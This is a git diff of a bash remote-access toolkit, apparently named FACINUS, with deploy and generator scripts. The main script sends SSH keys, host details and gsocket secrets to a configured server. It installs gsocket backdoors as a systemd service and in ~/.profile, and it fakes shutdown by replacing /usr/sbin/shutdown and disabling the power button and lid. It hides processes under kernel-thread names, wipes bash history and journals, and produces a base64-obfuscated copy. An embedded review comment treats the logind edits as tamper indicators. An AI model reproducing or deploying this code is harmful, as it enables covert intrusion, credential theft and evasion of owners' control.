diff --git a/scripts/deploy/y b/scripts/deploy/y index 151f7f5..faef2cd 100755 --- a/scripts/deploy/y +++ b/scripts/deploy/y @@ -1,19 +1,12 @@ #!/bin/bash -# FACINUS Remote Access Client -# This script sets up remote access capabilities on the target system -# ================= CONFIGURATION ================= SERVER_URL="SERVER_PLACEHOLDER" LOG_ENDPOINT="$SERVER_URL/deployment/log_receiver.php" AUTH_TOKEN="TOKEN_PLACEHOLDER" -VERSION="1.1.0" -# ================================================ -# Create temporary directory TEMP_DIR=$(mktemp -d) trap 'rm -rf "$TEMP_DIR"' EXIT -# ------- UTILITY FUNCTIONS ------- log_cmd() { local cmd="$1" local desc="$2" @@ -23,7 +16,6 @@ log_cmd() { echo "$ $cmd" >> "$log_file" echo "--------------------------------------------" >> "$log_file" - # Execute command and capture output and status local output output=$(eval "$cmd" 2>&1) local status=$? @@ -63,7 +55,6 @@ send_logs() { local sysinfo=$(get_system_info) local hostname=$(hostname) - # Submit logs to the server curl -s -X POST "$LOG_ENDPOINT" \ -F "auth_token=$AUTH_TOKEN" \ -F "hostname=$hostname" \ @@ -75,7 +66,6 @@ send_logs() { } detect_package_manager() { - # Detect the system's package manager if command -v apt &> /dev/null; then echo "apt" elif command -v dnf &> /dev/null; then @@ -91,7 +81,6 @@ detect_package_manager() { fi } -# ------- INSTALLATION FUNCTIONS ------- install_ssh() { local log_file="$TEMP_DIR/ssh_install.log" touch "$log_file" 
@@ -135,18 +124,15 @@ install_ssh() { ;; esac - # Get SSH key if it exists if [ -f ~/.ssh/id_rsa.pub ]; then send_logs "$log_file" "$(cat ~/.ssh/id_rsa.pub)" "ssh_key" else - # Try to create a new key if it doesn't exist log_cmd "ssh-keygen -t rsa -N '' -f ~/.ssh/id_rsa" "Generating SSH key" "$log_file" if [ -f ~/.ssh/id_rsa.pub ]; then send_logs "$log_file" "$(cat ~/.ssh/id_rsa.pub)" "ssh_key" fi fi - # Send SSH configuration local ssh_port=$(grep -E "^Port " /etc/ssh/sshd_config | awk '{print $2}') [ -z "$ssh_port" ] && ssh_port=22 @@ -161,7 +147,6 @@ setup_wol() { echo "[*] Setting up Wake-on-LAN..." - # Install ethtool if needed local pkg_manager=$(detect_package_manager) case "$pkg_manager" in apt) @@ -189,7 +174,6 @@ setup_wol() { ;; esac - # Get the primary interface local interface=$(ip route | grep default | awk '{print $5}' | head -n1) if [ -z "$interface" ]; then @@ -197,13 +181,10 @@ setup_wol() { return 1 fi - # Check current WoL status if ethtool "$interface" | grep -q "Wake-on: g"; then echo "[+] Wake-on-LAN is already enabled on $interface." - # Try to enable WoL log_cmd "sudo ethtool -s $interface wol g" "Enabling Wake-on-LAN" "$log_file" - # Create persistent configuration cat > "$TEMP_DIR/wol.service" << EOF [Unit] Description=Enable Wake-on-LAN on $interface @@ -223,9 +204,7 @@ EOF log_cmd "sudo systemctl enable wol.service" "Enabling WoL service" "$log_file" log_cmd "sudo systemctl start wol.service" "Starting WoL service" "$log_file" - # Get MAC address for WoL local mac=$(ip link show $interface | grep -E 'link/ether' | awk '{print $2}') - send_logs "$log_file" "{\"interface\":\"$interface\",\"mac\":\"$mac\"}" "wol_config" echo "[+] Wake-on-LAN configured for interface $interface (MAC: $mac)." @@ -241,7 +220,6 @@ setup_fake_poweroff() { echo "[*] Setting up fake poweroff..." - # Create the fake poweroff script cat > "$TEMP_DIR/fake-poweroff.sh" << 'EOF' #!/bin/bash # This script intercepts poweroff/shutdown commands and fakes a shutdown 
@@ -315,6 +293,9 @@ sudo mv "$TEMP_DIR/shutdown-wrapper" /usr/sbin/shutdown EOF log_cmd "sudo bash $TEMP_DIR/fake-poweroff.sh" "Installing fake poweroff scripts" "$log_file" + log_cmd "sudo sed -i 's/^#HandlePowerKey=poweroff/HandlePowerKey=ignore/' /etc/systemd/logind.conf" "Disabling pressing power key" "$log_file" + log_cmd "sudo sed -i 's/^#HandlePowerKeyLongPress=poweroff/HandlePowerKeyLongPress=ignore/' /etc/systemd/logind.conf" "Disabling long press power key" "$log_file" + log_cmd "sudo sed -i 's/^#HandleLidSwitch=suspend/HandleLidSwitch=ignore/' /etc/systemd/logind.conf" "Disabling lid switch" "$log_file" send_logs "$log_file" "Fake poweroff installed" "fake_poweroff" @@ -328,7 +309,6 @@ install_gsocket() { echo "[*] Installing gsocket for remote access..." - # Install dependencies local pkg_manager=$(detect_package_manager) case "$pkg_manager" in apt) @@ -349,18 +329,15 @@ install_gsocket() { ;; esac - # build gsocket if ! command -v gs-netcat &>/dev/null; then log_cmd "wget -q -O $TEMP_DIR/gsocket_linux-$(uname -m).tar.gz \"https://github.com/hackerschoice/gsocket/archive/refs/tags/v1.4.43.tar.gz\"" "Download gsocket" "$log_file" log_cmd "cd $TEMP_DIR && tar xfz gsocket_linux-*.tar.gz" "Extracting gsocket" "$log_file" log_cmd "cd $TEMP_DIR/gsocket-* && ./bootstrap && ./configure && make && sudo make install" "Building and install gsocket" "$log_file" fi - # Generate a unique secret local gs_root_secret=$(gs-netcat -g) local gs_user_secret=$(gs-netcat -g) - # Create systemd service for persistent connection cat > "$TEMP_DIR/gsocket-backdoor.service" << EOF [Unit] Description=GSocket Remote Access 
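Review bot: The three added `sed -i` calls that follow the fake-poweroff install edit `/etc/systemd/logind.conf` in place, with no backup suffix and no comment, setting `HandlePowerKey`, `HandlePowerKeyLongPress` and `HandleLidSwitch` to `ignore`. Their effect is that the host stops reacting to its physical power button and lid, and nothing in the hunk records the file's previous content. Alongside the `/usr/sbin/shutdown` replacement named in the hunk header, this is a tamper indicator that file-integrity monitoring or package verification of `logind.conf`, and audit rules on writes under `/etc/systemd/`, would surface. The code should at least state the change, e.g. `# rewrites logind.conf: power key, long press and lid switch set to ignore; no backup kept`. `setup_fake_poweroff` starts outside this hunk, so the rest of its body is not reviewed here.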
@@ -383,17 +360,12 @@ EOF log_cmd "sudo systemctl enable gsocket-backdoor.service" "Enabling gsocket service" "$log_file" log_cmd "sudo systemctl start gsocket-backdoor.service" "Starting gsocket service" "$log_file" - # Also put a gs-netcat backdoor in user's .profile log_cmd "echo 'killall -0 gs-netcat 2>/dev/null || (GSOCKET_ARGS=\"-s $gs_user_secret -liqD\" SHELL=/bin/bash exec -a bash gs-netcat)' >> ~/.profile" "Add backdoor to .profile" "$log_file" log_cmd "source ~/.profile" "Reloading .profile" "$log_file" - # Create connection instructions cat > "$TEMP_DIR/gsocket_info.txt" << EOF GSocket Connection Information ============================= -Root secret: $gs_root_secret -User secret: $gs_user_secret - Connect as root: gs-netcat -s $gs_root_secret -i Connect as user: gs-netcat -s $gs_user_secret -i ============================= @@ -404,7 +376,7 @@ EOF send_logs "$log_file" "$gs_user_secret" "gsocket_user_secret" send_logs "$log_file" "$(cat $TEMP_DIR/gsocket_info.txt)" "gsocket_info" - echo "[+] GSocket installed. You can connect using: gs-netcat -s $gs_root_secret" + echo "[+] GSocket installed. You can connect using: gs-netcat -s $gs_root_secret -i" } setup_stealth() { 
@@ -412,47 +384,18 @@ setup_stealth() { touch "$log_file" echo "[*] Setting up stealth mode..." - - # Hide processes by creating a systemd unit with hidden name - cat > "$TEMP_DIR/_.service" << 'EOF' -[Unit] -Description=System Update Service -After=network.target - -[Service] -Type=simple -ExecStart=/bin/bash -c 'while true; do sleep 3600; done' -Restart=always -RestartSec=10 -StandardOutput=null -StandardError=null - -[Install] -WantedBy=default.target -EOF - - sudo mv "$TEMP_DIR/_.service" /etc/systemd/system/ - log_cmd "sudo systemctl daemon-reload" "Reloading systemd" "$log_file" - log_cmd "sudo systemctl enable _.service" "Enabling hidden service" "$log_file" - log_cmd "sudo systemctl start _.service" "Starting hidden service" "$log_file" - - # Set up process name obfuscation script cat > "$TEMP_DIR/obfuscate.sh" << 'EOF' #!/bin/bash -# This script allows running commands with an obfuscated process name -# Function to run a command with an obfuscated name obfuscate_run() { local fake_name="$1" shift exec -a "$fake_name" "$@" } -# Install the function to user's bashrc if ! grep -q "obfuscate_run" ~/.bashrc; then cat >> ~/.bashrc << 'EOT' -# Obfuscation function obfuscate_run() { local fake_name="$1" shift @@ -461,7 +404,6 @@ obfuscate_run() { EOT fi -# Create helper aliases if ! grep -q "alias stealthy" ~/.bashrc; then cat >> ~/.bashrc << 'EOT' alias stealthy='obfuscate_run "[khugepageds]"' @@ -469,13 +411,11 @@ alias hidden='obfuscate_run "[migration/0]"' EOT fi -# Install a cron job to clear bash history periodically (crontab -l 2>/dev/null; echo "0 * * * * cat /dev/null > ~/.bash_history") | crontab - EOF log_cmd "bash $TEMP_DIR/obfuscate.sh" "Setting up process obfuscation" "$log_file" - # Create log rotation to clean service logs cat > "$TEMP_DIR/clean-logs.service" << 'EOF' [Unit] Description=Clean System Logs 
@@ -489,7 +429,6 @@ ExecStart=/bin/bash -c 'journalctl --vacuum-time=1d' [Install] WantedBy=default.target EOF - sudo mv "$TEMP_DIR/clean-logs.service" /etc/systemd/system/ cat > "$TEMP_DIR/clean-logs.timer" << 'EOF' @@ -515,30 +454,20 @@ EOF echo "[+] Stealth mode configured." } -# ------- MAIN EXECUTION ------- main() { local log_file="$TEMP_DIR/main.log" touch "$log_file" echo "[*] Beginning setup..." echo "[*] Target system: $(hostname) ($(whoami))" - sudo apt install -y curl jq &> /dev/null || true - - # Send initial system info send_logs "$log_file" "$(get_system_info)" "system_info" - - # Install components based on flags install_ssh setup_wol setup_fake_poweroff install_gsocket setup_stealth - echo "[+] Setup complete." echo "[+] All logs and credentials have been sent to the server." } - -# Run the main function main - diff --git a/scripts/detect_system.sh b/scripts/detect_system.sh index cf2f1fb..b8a9ee2 100755 --- a/scripts/detect_system.sh +++ b/scripts/detect_system.sh @@ -1,16 +1,12 @@ #!/bin/bash -# Detect system distro and architecture detect_system() { - # Detect architecture ARCH=$(uname -m) - # Detect distribution if [ -f /etc/os-release ]; then . /etc/os-release DISTRO_NAME=${ID,,} # Convert to lowercase - # Check if it's an Arch-based distro for arch_distro in "${ARCH_DISTROS[@]}"; do if [[ "$DISTRO_NAME" == *"$arch_distro"* ]]; then DISTRO="arch" @@ -18,7 +14,6 @@ detect_system() { fi done - # Check if it's a Debian-based distro for deb_distro in "${DEB_DISTROS[@]}"; do if [[ "$DISTRO_NAME" == *"$deb_distro"* ]]; then DISTRO="debian" @@ -26,7 +21,6 @@ detect_system() { fi done - # Check if it's an RPM-based distro for rpm_distro in "${RPM_DISTROS[@]}"; do if [[ "$DISTRO_NAME" == *"$rpm_distro"* ]]; then DISTRO="redhat" @@ -34,7 +28,6 @@ detect_system() { fi done - # If we can't determine the distro family, just use the ID DISTRO="$DISTRO_NAME" elif [ -f /etc/arch-release ]; then DISTRO="arch" 
diff --git a/scripts/generate_scripts.sh b/scripts/generate_scripts.sh index 96f17f8..d5abb80 100755 --- a/scripts/generate_scripts.sh +++ b/scripts/generate_scripts.sh @@ -6,14 +6,11 @@ generate_client_scripts() { echo "Generating client deployment scripts..." generate_main_client_script - generate_obfuscated_script - generate_presets } generate_main_client_script() { - # Copy the script to the server cp "$DEPLOY_DIR/y" "$SERVER_ROOT" # Replace placeholders in the script @@ -26,7 +23,6 @@ generate_main_client_script() { generate_obfuscated_script() { echo "Creating obfuscated version of the client script..." - # Base64 encode the script to obfuscate it base64 -w0 < "$DEPLOY_DIR/y" > "$DEPLOY_DIR/y.b64" cp "$DEPLOY_DIR/x" "$SERVER_ROOT/" @@ -39,7 +35,6 @@ generate_obfuscated_script() { generate_presets() { echo "Creating installation presets..." - # Replace placeholders for preset in "$DEPLOY_DIR/minimal" "$DEPLOY_DIR/full" "$DEPLOY_DIR/quiet"; do sed -i "s|SERVER_PLACEHOLDER|$SERVER_IP|g" "$preset" cp "$preset" "$SERVER_ROOT/"